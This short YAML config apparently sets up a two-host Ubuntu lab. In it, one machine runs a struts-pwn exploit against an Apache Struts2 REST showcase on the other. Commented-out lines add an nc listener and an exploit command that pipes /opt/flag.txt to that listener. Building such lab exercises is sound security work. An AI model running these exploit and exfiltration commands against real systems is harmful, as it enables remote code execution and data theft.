blueprint: ubuntu2204-ubuntu2204
ubuntu1:
  playbook: ubuntu1.yml
  command:
    - "echo 'hello world' | sudo tee /opt/hello > /dev/null"
ubuntu2:
  playbook: ubuntu2.yml
  command:
    -  "python3 /opt/struts-pwn/struts-pwn.py --url 'http://ubuntu1:8080/struts2-rest-showcase/orders/3' -c 'touch /tmp/struts-pwn' --exploit"
    # - "nc -nvlp 9000 > /tmp/captured_flag.txt &"
    # - "python3 /opt/struts-pwn/struts-pwn.py --url 'http://ubuntu1:8080/struts2-rest-showcase/orders/3' -c 'cat /opt/flag.txt | nc -u -q 0 %ubuntu2% 9000' --exploit"